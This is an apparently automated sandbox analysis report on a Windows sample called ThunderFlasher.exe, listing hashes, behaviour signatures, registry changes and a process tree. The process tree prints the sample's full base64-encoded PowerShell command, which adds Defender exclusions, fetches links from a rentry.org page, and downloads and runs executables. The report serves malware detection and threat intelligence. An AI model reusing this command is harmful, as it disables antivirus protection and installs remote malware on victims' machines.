Analysis
-
max time kernel
202s -
max time network
458s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-06-2024 07:57
Static task
static1
Behavioral task
behavioral1
Sample
ThunderFlasher.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ThunderFlasher.exe
Resource
win10v2004-20240611-en
General
-
Target
ThunderFlasher.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2572 powershell.exe 6 2572 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 155 camo.githubusercontent.com 418 camo.githubusercontent.com 781 camo.githubusercontent.com 119 camo.githubusercontent.com -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 868 powershell.exe 2956 powershell.exe 2192 powershell.exe 1296 powershell.exe 1940 powershell.exe 2572 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BA902353-D0C1-11EE-9966-EA483E0BCDAF}.dat = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{13F95991-3524-11EF-9966-EA483E0BCDAF} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingDelete iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exechrome.exepid process 2572 powershell.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exechrome.exedescription pid process Token: SeDebugPrivilege 2572 powershell.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe Token: SeShutdownPrivilege 1312 chrome.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
Processes:
iexplore.exechrome.exepid process 2532 iexplore.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
chrome.exepid process 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe 1312 chrome.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 2532 iexplore.exe 2532 iexplore.exe 2560 IEXPLORE.EXE 2560 IEXPLORE.EXE 2532 iexplore.exe 2560 IEXPLORE.EXE 2560 IEXPLORE.EXE 1748 IEXPLORE.EXE 1748 IEXPLORE.EXE 2532 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ThunderFlasher.exeiexplore.exechrome.exedescription pid process target process PID 2156 wrote to memory of 2572 2156 ThunderFlasher.exe powershell.exe PID 2156 wrote to memory of 2572 2156 ThunderFlasher.exe powershell.exe PID 2156 wrote to memory of 2572 2156 ThunderFlasher.exe powershell.exe PID 2532 wrote to memory of 2560 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 2560 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 2560 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 2560 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 1748 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 1748 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 1748 2532 iexplore.exe IEXPLORE.EXE PID 2532 wrote to memory of 1748 2532 iexplore.exe IEXPLORE.EXE PID 1312 wrote to memory of 1728 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1728 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1728 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1940 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 888 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 888 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 888 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe PID 1312 wrote to memory of 1528 1312 chrome.exe chrome.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ThunderFlasher.exe"C:\Users\Admin\AppData\Local\Temp\ThunderFlasher.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:799758 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef65a9758,0x7fef65a9768,0x7fef65a97782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2192 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2200 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1484 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1468 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3460 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3480 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3668 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3660 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2452 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3868 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3940 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=1424 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=708 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=920 --field-trial-handle=1228,i,4870864861552560812,10026836117950300787,131072 /prefetch:12⤵
-
